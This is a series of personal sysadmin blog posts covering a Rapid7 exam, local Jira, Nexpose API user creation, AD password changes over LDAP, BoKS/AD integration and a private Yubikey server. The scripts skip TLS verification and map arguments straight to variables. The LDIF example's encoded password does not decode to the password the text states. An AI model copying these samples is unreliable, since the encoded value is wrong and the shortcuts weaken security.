While preparing for the exam I searched online to find stories of test takers, describing their experiences with the NCA and NACA exams. Unfortunately I couldn't really find any, aside from one blogpost from 2012. 

For starters, the exam will be taken through Rapid7's ExpertTracks portal. If you're going to take their test, you might as well register beforehand. Purchasing the voucher through their website proved to be interesting: I ran into a few bugs which prevented my order from being properly processed. With the help of Rapid7's training department, things were sorted out in a few days and I got my voucher.

The examination site is nice enough, though there are two features that I missed while taking the test:

  1. There is no option to mark your questions for review, a feature most computer-based exams provide.
  2. Even if you could mark your questions, there apparently is no index page that allows you to quickly jump to specific questions. 

I made do with a notepad (to mark the questions) and by editing the URL in the address bar, to access the questions I wanted to review. 

The exam covers 75 questions, is "open book" and you're allowed to take 120 minutes. I finished in 44 minutes, with an 85% score (80% needed to pass). None of the questions struck me as badly worded, which is great! No apparent "traps" set out to trick you. 


kilala.nl tags: , ,

View or add comments (curr. 2)

Running Jira locally on Mac OS X

2016-03-10 19:39:00

Jira on OS X

It's no secret that I'm a staunch lover of Atlassian's Jira, a project and workload management tool for DevOps (or agile) teams. I was introduced to Jira at my previous client and I've introduced it myself at $CURRENTCLIENT. The ease with which we can outline all of our work and divide it among the team is wonderful and despite not actually using "scrum", we still reap plenty of benefits!

Unfortunately I couldn't get an official Jira project setup on $CUSTOMER's servers, so instead I opted for a local install on my Macbook. Sure, it foregoes a lot of the teamwork benefits that Jira offers, but at least it's something. Besides, this way I can use Jira for two of my other projects as well! 

Getting Jira up and running with a standalone installation on my Mac took a bit of fiddling. Even Atlassian's own instructions were far from bulletproof.

Here's what I did:

  1. Download the OS X installer for Jira. It comes as a .tgz.
  2. Extract the installer wherever you'd like; I even kept it in ~/Downloads for the time being.
  3. Make a separate folder for Jira's contents, like ~/Documents/Jira.
  4. Ensure that you have Java 8 installed on your Mac. Get it from Oracle's website.
  5. Browse to the unpacked Jira folder and find the script "check-java.sh". You'll need to change one line so it reads as follows, otherwise Jira won't boot: "$_RUNJAVA" -version 2>&1 | grep "java version" | (
  6. Find the files "start-jira.sh" and "stop-jira.sh" and add the following lines at their top:
export PATH="/Library/Internet Plug-Ins/JavaAppletPlugin.plugin/Contents/Home/bin:$PATH"
export JAVA_HOME="/Library/Internet Plug-Ins/JavaAppletPlugin.plugin/Contents/Home"
export JRE_HOME="/Library/Internet Plug-Ins/JavaAppletPlugin.plugin/Contents/Home"
export JIRA_HOME="/Users/thomas/Documents/Jira"

You should now be able to start up Jira from the Terminal, by running the "start-jira.sh" script. The best thing is that Jira handles the sleep mode of a laptop just fine (at least it does so on OS X), so you can safely forget about your Terminal session and close it. I've had Jira run for days on end, with many sleeps and resumes each day!

Upgrading Jira should be as easy as downloading the latest archive (step 1) and then repeating steps 5 and 6 on the files from the new installation. All Jira data lives outside of the installation path, thanks to step 3.
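In shell terms that amounts to something along these lines; the archive and directory names are just placeholders for whatever version you download:

cd ~/Downloads
tar xzf atlassian-jira-X.Y.Z.tgz
cd atlassian-jira-X.Y.Z-standalone/bin
# Re-apply the check-java.sh edit (step 5) and add the same four export
# lines to start-jira.sh and stop-jira.sh (step 6), then:
./start-jira.sh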

EDIT: If you ever need to move your Jira data directory elsewhere (or rename it), then you'll need to re-adjust the setting of JIRA_HOME in the shell scripts. You will also need to change the database path in dbconfig.xml (which lives inside your Jira data directory). 


kilala.nl tags: , ,

View or add comments (curr. 0)

Using the Nexpose API in Linux shell scripts to bulk-create users

2016-03-02 15:09:00

The past few weeks I've spent at $CLIENT, working on their Nexpose virtual appliances. Nexpose is Rapid7's automated vulnerability scanning tool, which may also be used in unison with Rapid7's more famous product: Metasploit. It's a pretty nice tool, but it certainly needs some work to get it all up and running in a large, corporate environment.

One of the more practical aspects of our setup is the creation of user accounts in Nexpose's web interface. Usually, you'd have to click a few times and fill out a bunch of text fields for each user. This gets boring for larger groups of users, especially if you have more than one Security Console host. To make our lives just a little easier, we have at least set up the hosts to authenticate against AD.

I've fiddled around with Nexpose's API this afternoon, and after a lot of learning and trying ("Van proberen ga je het leren!", or "you learn by trying!", as I always tell my daughter) I've gotten things to work very nicely! I now have a basic Linux shell script (bash, but should also work in ksh) that creates user accounts in the Nexpose GUI for you!

Below is a small PoC, which should be easily adjusted to suit your own needs. Enjoy!

=====================================

#!/bin/bash
 
# In order to make API calls to Nexpose, we need to setup a session.
# A successful login returns the following:
# <LoginResponse success="1" session-id="F7377393AEC8877942E321FBDD9782C872BA8AE3"/>
 
NexposeLogin() {
        NXUSER=""
        NXPASS=""
        NXSERVER="127.0.0.1"
        NXPORT="3780"
        API="1.1"
        URI="https://${NXSERVER}:${NXPORT}/api/${API}/xml"
        NXSESSION=""
 
        echo -e "\n===================================="
        echo -e " LOGGING IN TO NEXPOSE, FOR API CALLS."
        echo -e "\n===================================="
        echo -e "Admin username: \c"; read NXUSER
        echo -e "Admin password: \c"; read NXPASS
 
        LOGIN="<LoginRequest synch-id='0' password='${NXPASS}' user-id='${NXUSER}'></LoginRequest>"
 
        export NXSESSION=$(echo "${LOGIN}" | curl -s -k -H "Content-Type:text/xml" -d @- ${URI} | head -1 | awk -F\" '{print $4}')
}
 
# Now that we have a session, we can make new users.
#    You will need to know the ID number for the desired authenticator.
# You can get this with: <UserAuthenticatorListingRequest session-id='...'/>
#    A user request takes the following shape, based on the API v1.1 docu.
#  <UserSaveRequest session-id='...'>
#  <UserConfig id="-1" role-name="user" authsrcid="9" authModule="LDAP" name="apitest2"
#   fullname="Test van de API" administrator="0" enabled="1">
#  </UserConfig>
#  </UserSaveRequest>
# On success, this returns:
#  <UserSaveResponse success="1" id="41">
# </UserSaveResponse>
 
NexposeCreateUser() {
        NEWUSER="${1}"
        SUCCESS="0"
        NXAUTHENTICATOR="9" # You must figure this out from Nexpose, see above
        NXROLE="user"
        SCRATCHFILE="/tmp/$(basename ${0}).temp"
 
        echo "<UserSaveRequest session-id='${NXSESSION}'>" > ${SCRATCHFILE}
        echo "<UserConfig id='-1' role-name='${NXROLE}' authsrcid='${NXAUTHENTICATOR}' authModule='LDAP' name='${NEWUSER}' fullname='${NEWUSER}' administrator='0' enabled='1'>" >> ${SCRATCHFILE}
        echo "</UserConfig>" >> ${SCRATCHFILE}
        echo "</UserSaveRequest>" >> ${SCRATCHFILE}
 
        SUCCESS=$(cat ${SCRATCHFILE} | curl -s -k -H "Content-Type:text/xml" -d @- ${URI} | head -1 | awk -F\" '{print $2}')
        [[ ${SUCCESS} -eq 0 ]] && logger ERROR "Failed to create Nexpose user ${NEWUSER}."
        rm ${SCRATCHFILE}
}
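
# Optional helper (a sketch, not required for the PoC above): dump the
# authenticator listing mentioned earlier, so you can look up the authsrcid
# value to use in NexposeCreateUser. The raw XML response is printed as-is;
# read the authenticator IDs from it manually. Call it right after NexposeLogin.
NexposeListAuthenticators() {
        echo "<UserAuthenticatorListingRequest session-id='${NXSESSION}'/>" | \
                curl -s -k -H "Content-Type:text/xml" -d @- ${URI}
        echo ""
}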
 
NexposeLogin
NexposeCreateUser apitest1

kilala.nl tags: , ,

View or add comments (curr. 0)

My first online gaming experience: Darkscapes MUD

2016-01-06 06:04:00

Fifteen years ago I graduated college at Hogeschool Utrecht. Before I got that far, I spent four years studying electronics, programming, telecommunications and more. I also had a lot of fun with my classmates! At the time I was already familiar with role playing as well as trading card games (D&D, Magic, etc), but my classmate Erik introduced me to the joys of Warhammer 40k and World of Darkness games. 

My biggest time waster in first and second year was something entirely different though: it was my introduction to online gaming, as well my first MMORPG! A few students at HvU ran a MUD (multi-user dungeon) on a school server and I spent hours questing and talking to other players. It was a grand experience, especially since the text-based interface was light enough to even work on a very slow Internet connection. Through the game I went on to meet Maya Deva, a woman who was absolutely dedicated to her D&D games and who went on to work for TSR a little while. 

Over the years I've fondly remembered that MUD, whose name escaped me. I'd always wondered whether it was still running on some hidden-away server somewhere.

Turns out that it is! Much to my surprise, my ITGilde colleague Mark was one of the admins of that MUD, which was called DarkScapes. It's not the same instance I used to play in (my account "Beowulf" was gone), but it's a rebuild based off old backups. Still, it was great to find this relic of my past and to walk around that world again!


kilala.nl tags: ,

View or add comments (curr. 0)

Changing users' passwords in Active Directory 2016, from anywhere

2016-01-04 09:28:00

As part of an ongoing research project I'm working on, I've had the need to update an end-user's password in Microsoft's Active Directory. Not from Windows, not through "ADUC" (AD Users and Computers), but from literally anywhere. Thankfully I stumbled upon this very handy lesson from the University of Birmingham. 

I've tweaked their example script a little bit, which results in the script shown at the bottom of this post. Using said script as a proof of concept I was able to show that the old-fashioned way of using LDAP to update a user's password in AD will still work on Windows Server 2016 (as that's the target server I run AD on). 

 

Called as follows:

$ php encodePwd.php user='Pippi Langstrumpf' newpw=Bora38Sr > Pippi.ldif

Resulting LDIF file:

$ cat Pippi.ldif 
dn: CN=Pippi Langstrumpf,CN=Users,DC=broehaha,DC=nl
changetype: modify
replace: unicodePwd
unicodePwd:: IgBOAG8AggBhQDMAOQBGAHIAIgA=

Imported as follows:

$ ldapmodify -f Pippi.ldif -H ldaps://win2016.broehaha.nl -D 'CN=Administrator,CN=Users,DC=broehaha,DC=nl' -W
Enter LDAP Password: 
modifying entry "CN=Pippi Langstrumpf,CN=Users,DC=broehaha,DC=nl"

Once the ldapmodify has completed, I can login to my Windows Server 2016 host with Pippi's newly set password "Bora38Sr".
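To verify the change from the Linux side as well, a simple bind as the user will do; for example with OpenLDAP's ldapwhoami (just a quick check, nothing fancy):

$ ldapwhoami -x -H ldaps://win2016.broehaha.nl -D 'CN=Pippi Langstrumpf,CN=Users,DC=broehaha,DC=nl' -w 'Bora38Sr'

If the bind succeeds, the new password is active.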

 



<?php

// Encode a plaintext password the way Active Directory's unicodePwd
// attribute expects it: wrap it in double quotes and convert it to UTF-16LE
// (each character followed by a NUL byte, which works for ASCII passwords),
// then base64-encode the result so it can be used in an LDIF file.
function EncodePwd($pw) {
  $newpw = '';
  $pw = "\"" . $pw . "\"";
  $len = strlen($pw);
  for ($i = 0; $i < $len; $i++)
      $newpw .= "{$pw{$i}}\000";
  $newpw = base64_encode($newpw);
  return $newpw;
}

 if($argc > 1) {
	foreach($argv as $arg)  {
	list($argname, $argval) = split("=",$arg);
	$$argname = $argval;
	}
  }

  $userdn = 'CN='.$user.',CN=Users,DC=broehaha,DC=nl';

  $newpw64 = EncodePwd($newpw);

  $ldif=<<<EOT
dn: $userdn
changetype: modify
replace: unicodePwd
unicodePwd:: $newpw64
EOT;

  print_r($ldif);

?>

kilala.nl tags: , ,

View or add comments (curr. 0)

Integrating BoKS and Windows Active Directory

2015-12-18 10:59:00

As part of an ongoing research project for Fox Technologies I had a need for a private Windows Active Directory server. Having never built a Windows server, let alone a domain controller, it's been a wonderful learning experience. The following paragraphs outline the process I used to build a Windows AD KDC and how I set up the initial connections from the BoKS hosts.

 

Windows server setup

I run all my tests using the Parallels Desktop virtualization product. The first screenshot below will show five hosts running concurrently on my Macbook Air: a Windows Server 2012 host and four hosts running RHEL6 (BoKS master, replica and two clients). 

Even installing Windows Server 2012 proved to be a hassle, insofar as the .ISO image provided by Microsoft (for evaluation purposes) appears to be corrupt. Every single attempt to install resulted in error code 0x80070570 halfway through. This is a known issue and the only current workaround appears to lie in using an alternative ISO image provided by a good samaritan. Of course, one ought to be leery about using installation software not provided by the actual vendor, so caveat emptor.

Once the installation has completed, set up basic networking as desired. Along the way I opted to disable IPv6, as leaving it enabled would make the setup and troubleshooting of Kerberos a bit more complicated. 

Next up, it's time to add the appropriate Roles to the new Windows server. This is done through Windows Server Manager; from the "Manage" menu one should pick "Add roles and features". Add: Active Directory Domain Services, Active Directory Certificate Services and DNS Server.

This tutorial by Rackspace quickly details how to set up the Domain Services. In my case I set up the forest "broehaha.nl", which matches the name of the domain (and my LDAP directory on Linux). Setting up the CA (certificate authority) requires stepping through a wizard, using the default values provided. 

BoKS will also require the installation of the (deprecated) role Identity Manager for Unix. Microsoft provide excellent instructions on how to install these features on Windows 2012, through the command line. In short, the commands are (NOTE the disabling of NIS):

Dism.exe /online /enable-feature /featurename:adminui /all
Dism.exe /online /disable-feature /featurename:nis /all
Dism.exe /online /enable-feature /featurename:psync /all

 

The Windows AD KDC should be in sync with the time on the Linux hosts. Set up NTP to use the same NTP servers as follows:

w32tm /config /manualpeerlist:pool.ntp.org /syncfromflags:MANUAL
Stop-Service w32time
Start-Service w32time

 

Export the root CA certificate by running:

certutil -ca.cert windows_ca.crt >windows_ca.txt
certutil -encode windows_ca.crt windows_ca.cer

 

You may now SCP the windows_ca.cer file to the various Linux hosts (for example by using pscp, from the Putty team). 

Now it's time to put some data into DNS and Active Directory. Using the "AD Users and Computers" tool, create Computer records for all BoKS hosts. These records will not automatically include the full DNS names, as these will be filled at a later point in time. Using the DNS tool, create a forward lookup zone for your domain (broehaha.nl in my case) as well as a reverse lookup zone for your IP range (10.211.55.* for me). In the forward zone create A records for your Windows and your Linux hosts (the wizard can automatically create the reverse PTR records). See below screenshots for some examples.

 

 

Linux / BoKS server setup

My Linux hosts were already installed, as part of my BoKS testing environment. All hosts run RHEL6 and BoKS 7.0. The master server has Apache and OpenLDAP running for my Yubikey testing environment.

First order of business is to ensure that the Linux hosts all use the Windows DNS server. The best way to arrange this is to ensure that /etc/sysconfig/network-scripts/ifcfg-eth0 (adjust for the relevant interface name) has entries for the DNS server and search domains. In my case it's as follows (with DNS2 being my default DNS for everything outside of my testing environment):

DNS1=10.211.55.70
DNS2=10.211.55.1
DOMAIN=broehaha.nl

 

As was said, NTP should be running to have time synchronization among all servers involved.

Your Kerberos configuration file should be adjusted to match your AD domain:

[logging]
 default = FILE:/var/log/krb5libs.log
 kdc = FILE:/var/log/krb5kdc.log
 admin_server = FILE:/var/log/kadmind.log

[libdefaults]
 dns_lookup_realm = true
 dns_lookup_kdc = true
 ticket_lifetime = 24h
 renew_lifetime = 7d

 default_realm = BROEHAHA.NL
 forwardable = true
[realms]
 BROEHAHA.NL = {
  kdc = windows.broehaha.nl
  admin_server = windows.broehaha.nl
 }

[domain_realm]
 .broehaha.nl = BROEHAHA.NL

 

If so desired you may test the root CA certificate from the Windows server, after which the certificate may be installed:

openssl x509 -in /home/thomas/windows_ca.cer -subject -issuer -purpose
cp /home/thomas/windows_ca.cer /etc/openldap/cacerts/
cacertdir_rehash /etc/openldap/cacerts

 

You should be able to test basic access to AD as follows:

ldapsearch -v -x -H ldaps://windows.broehaha.nl:636 -D "CN=Administrator,CN=Users,DC=BROEHAHA,DC=NL" -b "DC=BROEHAHA,DC=NL" -W
ldapsearch -vv -Y GSSAPI -H ldap://windows.broehaha.nl -b "DC=BROEHAHA,DC=NL"

 

Now you may join your Linux host(s) to the Windows AD domain:

kinit bokssync@BROEHAHA.NL
Password for bokssync@BROEHAHA.NL:
adjoin join -K windows.broehaha.nl BROEHAHA.NL Administrator@BROEHAHA.NL
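If the join acts up, klist is a quick way to confirm that the kinit actually got you a ticket-granting ticket from the Windows KDC; look for a krbtgt/BROEHAHA.NL@BROEHAHA.NL entry in its output:

klist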

 

If you now use "AD Users and Computers" on the Windows server, you'll notice that the fully qualified DNS name of the Linux host has been filled in. 

Basic AD connectivity has now been achieved. We'll start putting it to good use in an upcoming tutorial.


kilala.nl tags: , ,

View or add comments (curr. 0)

In-between assignments? What an opportunity!

2015-11-23 14:38:00

It's been two weeks now since I've left my friends and colleagues at my previous assignment. I didn't have a new gig lined up, so for now I'm "in-between assignments". Am I having a dreary time and am I scrambling for something new? Maybe surprisingly, I'm not! I've been busier than ever!

I'd argue that some downtime between jobs is an excellent opportunity! 

  1. Learn something new
  2. Meet new people
  3. Deflate

 

Learn something new

Now is your chance to finally get started on all those things you've been meaning to learn and study! Make sure to plan a few hours every day to spend on research and studies. This will also help you maintain your workday rhythm. 

 

Meet new people

Of course you're going job hunting! Putting that aside though, I've found it tremendous to also go and meet people in my business just for the heck of it. Some would call this networking, I just call it fun :)

Why not visit one of your industry's conventions, now that you have the time? Or use Meetup.com to find social gatherings that look interesting or beneficial. Every week there's something you could help out with or learn about.

 

Deflate

And you know what? Relish your downtime! Get some exercise, go for a walk, enjoy the scenery. Feeling ambitious and feeling the urge to start running? Give the famous "Couch to 5k" schedule a shot! Not thinking about work for a few hours may help you push harder when you need to!

 

What have I been doing?

I've spent a few days learning a new programming language (Python in my case) by signing up for Codecademy. I've also spent a few days learning about MFA tokens and on integrating those with software I'm already familiar with. And now I'm also hitting the books on Oracle and SQL. 

I've hit the Blackhat Europe convention and learned a lot of new things. I'll also be meeting with people from a big-name college and with an IT service provider. Both talks could perhaps lead to something in the future, but for now I simply want to learn about their activities.  

 

And after all that hard work-that's-not-actually-work? I'm deflating by taking some walks around town and by playing a game or two. I really ought to thank my employer for this great "work-cation".


kilala.nl tags: ,

View or add comments (curr. 0)

Integrating FoxT BoKS ServerControl with Yubikey (MFA) authentication

2015-11-17 10:03:00

As promised, I’ve put some time into integrating the Yubikey Neo that I was gifted with Fox Technologies BoKS.  For those who are not familiar with BoKS, here’s a summary I once wrote. I’ve always enjoyed working with BoKS and I do feel that it’s a good solution to the RBAC-problems we may have with Linux and Windows servers. So when I was gifted a Yubikey last week, I couldn’t resist trying to get it to work with BoKS.

My first order of business was to set up a local, private Yubikey validation infrastructure. This was quickly followed by using an LDAP server to host both user account data and Yubikey bindings (like so). And now follows the integration with BoKS!

 

Yubikey and BoKS: it takes a little work

The way I see it, there are at least three possible integration solutions that we "mere mortals" may achieve. There are definitely other ways, but they require access to the BoKS sources, which we won't get (like building a custom authenticator method that uses YKCLIENT).

  1. Adjust your software to use Yubikey through PAM, and then have PAM use BoKS as well.
  2. Adjust your software to use PGP/SSH keys stored on Yubikey.
  3. Adjust your software to authenticate against Kerberos, which in turn uses Yubikey OTP. BoKS allows Kerberos authentication by default.

Putting this into a perspective most of us feel comfortable with, SSH, this would lead to:

  1. Run a second SSH daemon next to the BoKS-provided SSH. This second daemon will only allow Yubikey+password MFA logins and is only accessible to a select group of people. This requires the definition of a custom access method and some PAM customizations.
  2. A solution like this, with PGP/SSH keys.
  3. Using BoKS-sshd, together with the Kerberos authentication method defined by BoKS.

In my testing environment I’ve gotten solution #1 to work reliably. The next few paragraphs will describe my methods.

 

Requirements

The following assumes that you already have:

All the changes described will need to be made on all your BoKS systems. The clients running the special SSH daemon with Yubikey support will need the PAM files as well as all the updates to the BoKS configuration files. The master and replicas will technically not need the changes you make to the SSH daemon and the PAM files, unless they will also be running the daemon. Of course, once you've gotten it all to run correctly, you'd be best off to simply incorporate all these changes into your custom BoKS installation package!

 

Let’s build a second daemon

BoKS provides it’s own fork of the OpenSSH daemon and for good reason! They expanded upon its functionality greatly, by allowing much greater control over access and fine-grained logging. With BoKS you can easily allow someone SCP access, without allowing shell access for example. One thing FoxT did do though, is hard-disable PAM for this custom daemon. And that makes it hard to use the pam_yubico module. So what we’ll do instead, is fire up another vanilla OpenSSH daemon with custom settings.

Downside to this approach is that you lose all fine-grained control that BoKS usually provides over SSH. Upside is that you’re getting a cheap MFA solution :) Use-cases would include your high-privileged system administrators using this daemon for access (as they usually get full SSH* rights through BoKS anyway), or employees who use SSH to specifically access a command-line based application which requires MFA.

The following commands will set up the required configuration files. This list assumes that BoKS is enabled (“sysreplace replace”), because otherwise the placement of the PAM files would be slightly different.
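In essence you copy the stock OpenSSH daemon and its configuration under a new name, and give that daemon its own PAM service file. A minimal sketch, assuming RHEL6's stock OpenSSH and the paths used in the rest of this article:

cp /usr/sbin/sshd /usr/sbin/yubikey-sshd
cp /etc/ssh/sshd_config /etc/ssh/yubikey-sshd_config
cp /etc/pam.d/sshd /etc/opt/boksm/pam.d/yubikey-sshd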

I’ve edited /etc/ssh/yubikey-sshd_config, to simply adjust the port number from “22” to “2222”. Pick a port that’s good for you. At this point, if you start “/usr/sbin/yubikey-sshd -f /etc/ssh/yubikey-sshd_config” you should have a perfectly normal SSH with Yubikey authentication running on port 2222.

You can ensure that only Yubikey users can use this SSH access by adding “AllowGroups yubikey” to the configuration file (and then adding said Posix group to the relevant users). This ensures that access doesn’t get blown open if BoKS is temporarily disabled.
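Creating that group and adding a user to it is plain old Linux administration, for example:

groupadd yubikey
usermod -aG yubikey thomas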

Finally, we need to adjust the PAM configuration so yubikey-sshd starts using BoKS. I’ve changed the /etc/opt/boksm/pam.d/yubikey-sshd file to read as follows:

#%PAM-1.0
auth      required   pam_sepermit.so
auth      required   pam_yubico.so mode=client ldap_uri=ldap:/// ldapdn= user_attr=uid yubi_attr=yubiKeyId id= key= url=http:///wsapi/2.0/verify?id=%d&otp=%s
auth      required   pam_boks.so.1
account   required   pam_boks.so.1
account   required   pam_nologin.so
password  required   pam_boks.so.1
# pam_selinux.so close should be the first session rule
session   required   pam_selinux.so close
session   required   pam_loginuid.so
session   required   pam_boks.so.1
# pam_selinux.so open should only be followed by sessions to be executed in the user context
session   required   pam_selinux.so open env_params
session   optional   pam_keyinit.so force revoke

 

Caveat: public key authentication

Unless you are running OpenSSH 6.x as a daemon (which is NOT included with RHEL6 / CentOS 6), you must disable public key authentication in /etc/ssh/yubikey-sshd_config. Otherwise, public key authentication will take precedence and the Yubikey will be completely bypassed.

So, edit yubikey-sshd_config to include the standard OpenSSH directive:

PubkeyAuthentication no

 

Reconfiguring BoKS

The file /etc/opt/boksm/sysreplace.conf determines which configuration files get affected in which ways when BoKS security is either activated or deactivated. Change the “pamdir” line by appending “yubikey-sshd”:

file pamdir relinkdir,copyfiles,softlinkfiles /etc/pam.d $BOKS_etc/pam.d vsftpd remote login passwd rexec rlogin rsh su gdm kde kdm xdm swrole gdm-password yubikey-sshd

The file /etc/opt/boksm/bokspam.conf ties PAM identifiers into BoKS access methods. Whenever PAM sends something to pam_boks.so.1, this file will help in figuring out what BoKS action the user is trying to perform. At the bottom of this file I have added the following line:

yubikey-sshd   YUBIKEY-SSHD:${RUSER}@${RHOST}->${HOST}, login, login_info, log_logout, timeout

The file /etc/opt/boksm/method.conf defines many important aspects of BoKS, including authentication and access "methods". The elements defined in this file will later appear in "access routes" (BoKS-lingo for rules). At the bottom of this file I have added the following, which is a modification of the existing SSH_SH method:

METHOD YUBIKEY-SSHD:  user@host->host,    -prompt, timeout, login, noroute, @-noroute, usrqual, uexist, add_fromuser

By now it’s a good idea to restart your adjusted SSH daemon and BoKS. Check the various log files (/var/log/messages, /var/opt/boksm/boks_errlog) for obvious problems.
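For the SSH part that can be as simple as the sketch below; restarting BoKS itself I'll leave to its own tooling:

/usr/sbin/yubikey-sshd -t -f /etc/ssh/yubikey-sshd_config
pkill -f yubikey-sshd; /usr/sbin/yubikey-sshd -f /etc/ssh/yubikey-sshd_config
tail /var/log/messages /var/opt/boksm/boks_errlog

The first line only checks the configuration syntax (-t), the second restarts the daemon and the third shows the tail ends of both logs.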

 

Assigning access

My user account BoKS.MGR:thomas has userclass (BoKS-speak for "role") "BoksAdmin". I've made two changes to my account (which assumes that group "yubikey" already exists): I added "yubikey" as a secondary Posix group, and I added an access route for the new yubikey-sshd method to the BoksAdmin userclass.

This leaves me as follows:

[root@master ~]# lsbks -aTl *:thomas
Username:                     BOKS.MGR:thomas
User ID:                      501
User Classes:                 BoksAdmin
Group ID:                     501
Secondary group ID's:         505 (ALL:yubikey)
[...]
Assigned authenticator(s):    ssh_pk
                              ldapauth
Assigned Access Routes via User Classes
BoksAdmin                     login:*->BOKS.MGR 00:00-00:00, 1234567
                              su:*->root@BOKS.MGR 00:00-00:00, 1234567
                              yubikey-sshd:ANY/PRIVATENET->BOKS.MGR 00:00-00:00, 1234567
                              ssh*:ANY/PRIVATENET->BOKS.MGR 00:00-00:00, 1234567

 

Proof: Pam_yubico works with pam_BoKS

The screenshot below shows two failed login attempts by user Sarah, who does have a Yubikey but who lacks the Posix group “yubikey”. Below is a successful login by user Thomas who has both a Yubikey and the required group.

yubikey BoKS ssh login failure

The screenshot below shows a successful login by myself, with the resulting BoKS audit log entry.

yubikey ssh BoKS login success


kilala.nl tags: , , ,

View or add comments (curr. 0)

A new project: a private Yubikey server infrastructure

2015-11-14 20:48:00

I was recently gifted a Yubikey Neo at the Blackhat Europe 2015 conference. I'd heard about Yubico's nifty little USB device before but never really understood what the fuss was about. I'm no fan of Facebook or GMail, so instead I thought I'd see what Yubikey could do in a Unix environment!

I've been playing with the YK for two days now and I've managed to get the following working quite nicely:

I have written an extensive tutorial on how I built the above. In the near future you may expect expansions, including tie-in to LDAP as well as BoKS. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Building a local Yubikey server infrastructure

2015-11-13 23:05:00

I recently was gifted a Yubikey Neo at the Blackhat Europe 2015 conference. I'd heard about Yubico's nifty little USB device before but never really understood what the fuss was about. I'm no fan of Facebook or GMail, so instead I thought I'd see what Yubikey could do in a Unix environment!

In the next few paragraphs I will explain how I built the following:

At the bottom of this article you will find a video outlining the final parts of the process: registering a new Yubikey and then using it for SSH MFA.

 

Yubikey infrastructure: how does it all work?

Generally speaking, any system that runs authentication based on Yubikey products will communicate with the YubiCloud, i.e. the Yubico servers. In a corporate environment this isn't desirable, which is why Yubico have created an open source, on-premises solution consisting of two parts: ykval and ykksm.

yubikey infrastructure

Any product desiring to use YK authentication will contact the ykval server to verify that the card in question is indeed valid and used by the rightful owner. To achieve this, ykval will contact the ykksm server and attempt to perform an encryption handshake to see if the card truly matches the expected signatures.

Yubico provide open source tools and APIs that help you build YK authentication into your software. In the case of SSH (and other Unix tools), all of this can be achieved through PAM. There are many different options for authenticating your SSH sessions using a Yubikey and I've opted to go with the easiest: the OTP (one-time password) method. I'm told that you can also use YK in a challenge/response method with later versions of OpenSSH. It's also possible to actually use your YK as a substitute for your SSH/PGP keys.

 

Caveat: AES keys

The AES keys stored in YKKSM cannot be the ones associated with your Yubikey product when they leave the factory. Yubico no longer make these keys available to their customers. Thus, in order to run your own local Yubikey infrastructure, you will be generating your own AES keys and storing them on the Yubikey.

 

Caveat: OpenSSH versions

My whole project revolves around using CentOS 6.7. Red Hat have made certain choices with regards to upgrading and patching of the software that’s part of RHEL and thus 6.x “only” runs OpenSSH 5.2. This means that a few key features from OpenSSH 6.2 (which are great to use YK as optional MFA) are not yet available. Right now we’re in an all-or-nothing approach :)

 

Caveat: SELinux and Yubikey

 

If we have SELinux enabled, it has been suggested that the following tweaks will be needed:

 

Requirements:

On the server(s) you will need to install the following packages through Yum: git-core httpd php mysql-server make php-curl php-pear php-mysql wget help2man mcrypt php-mcrypt epel-release. After making EPEL available, also install “pam_yubico” and “ykclient” through Yum.

On the client(s) you will only need to install both “epel-release” and “pam_yubico” (through EPEL). Installing “ykclient” is optional and can prove useful later on.

On the server(s) you will need to adjust /etc/sysconfig/iptables to open up ports 80 and 443 (https is not included in my current documentation, but is advised).
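Rolled into commands, that comes down to something like the following; the iptables lines assume the stock CentOS 6 ruleset:

yum -y install git-core httpd php mysql-server make php-curl php-pear php-mysql \
    wget help2man mcrypt php-mcrypt epel-release
yum -y install pam_yubico ykclient
iptables -I INPUT -p tcp --dport 80 -j ACCEPT
iptables -I INPUT -p tcp --dport 443 -j ACCEPT
service iptables save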

 

Installation of the server:

EPEL has packages available for both the ykval and the ykksm servers. However, I have chosen to install the software through their GIT repository. Pulling a GIT repo on a production server in your corporate environment might prove a challenge, but I’m sure you’ll find a way to get the files in the right place :D

First up, clone the GIT repos for ykval and ykksm:
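Assuming Yubico's GitHub repository names are still yubikey-val and yubikey-ksm, that would be:

git clone https://github.com/Yubico/yubikey-val.git
git clone https://github.com/Yubico/yubikey-ksm.git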

 

A few tweaks are now needed:

From this point onwards, you may work your way through the vendor-provided installation guides:

  1. Install guide for YKKSM (also included in GIT)
  2. Install guide for YKVAL (also included in GIT)

More tweaks are needed once you are finished:

Restart both MySQL and Apache, to make sure all your changes take effect.

 

Initial testing of the infrastructure

We have now reached a point where you may run an initial test to make sure that both ykval and ykksm play nicely. First off, you may register a new client API key, for example:

$ ykval-gen-clients --urandom --notes "Client server 2"
5,b82PeHfKWVWQxYwpEwHHOmNTO6E=

This has registered client number 5 (“id”) with the API key “b82PeHfKWVWQxYwpEwHHOmNTO6E=”. Both of these will be needed in the PAM configuration later on. Of course you may choose to reuse the same ID and API key on all your client systems, but this doesn’t seem advisable. It’s possible to generate new id-key pairs in bulk and I’m sure that imaginative Puppet or Chef administrators will cook up a nice way of dispersing this information to their client systems.

You can run the actual test as follows. You will recognize the client ID (“5”) and the API key from before. The other long string, starting with “vvt…” is the output of my Yubikey. Simply tap it once to insert a new string. The verification error shown below indicates that this OTP has already been used before.

$ ykclient --url "http://127.0.0.1/wsapi/2.0/verify" --apikey b82PeHfKWVWQxYwpEwHHOmNTO6E=
     5 vvtblilljglkhjnvnbgbfjhgtfnctvihvjtutnkiiedv --debug
Input:
  validation URL: http://127.0.0.1/wsapi/2.0/verify
  client id: 5
  token: vvtblilljglkhjnvnbgbfjhgtfnctvihvjtutnkiiedv
  api key: b82PeHfKWVWQxYwpEwHHOmNTO6E=
Verification output (2): Yubikey OTP was replayed (REPLAYED_OTP)

For the time being you will NOT get a successful verification, as no Yubikeys have been registered yet.

 

Registering user keys

At the bottom of this article you will find a video outlining the final parts of the process: registering a new Yubikey and then using it for SSH MFA.

As I mentioned before, you cannot retrieve the AES key for your Yubikey to include in the local KSM. Instead, you will be generating new keys to be used by your end-users. There’s two ways to go about this:

In either case you will need the so-called Yubikey Personalization Tools, available for all major platforms. Using this tool you will either input or generate and then store the new key onto your Yubikey.

 

yubikey personalization tools

 

The good thing about the newer Yubico hardware products is that they have more than one “configuration slot”. By default, the factory will only fill slot 1 with the keys already registered in YubiCloud. This leaves slot 2 open for your own use. Of course, slot 1 can also be reused for your own AES key if you so desire.

It’s mostly a matter of user friendliness:

In my case I’ve generated the new key through the Personalization Tool and then inserted it into the ykksm database in the quickest and dirtiest method: through MySQL.

$ mysql
USE ykksm;
